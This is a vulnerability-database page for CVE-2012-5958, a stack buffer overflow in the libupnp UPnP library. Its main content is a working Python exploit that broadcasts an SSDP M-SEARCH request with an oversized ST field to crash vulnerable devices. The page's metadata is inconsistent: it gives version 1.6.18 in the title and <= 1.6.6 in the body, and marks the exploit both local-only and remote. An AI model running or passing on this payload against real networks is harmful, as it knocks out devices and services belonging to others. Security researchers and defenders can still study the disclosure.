libupnp 1.6.18 Stack-based buffer overflow (DoS)

2020.11.27
Credit: Patrik Lantz
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) # Date: 2020-08-20 # Exploit Author: Patrik Lantz # Vendor Homepage: https://pupnp.sourceforge.io/ # Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download # Version: <= 1.6.6 # Tested on: Linux # CVE : CVE-2012-5958 import socket payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:" payload += "A"*324 + "BBBB" payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n" byte_message = bytes(payload) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(byte_message, ("239.255.255.250", 1900))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top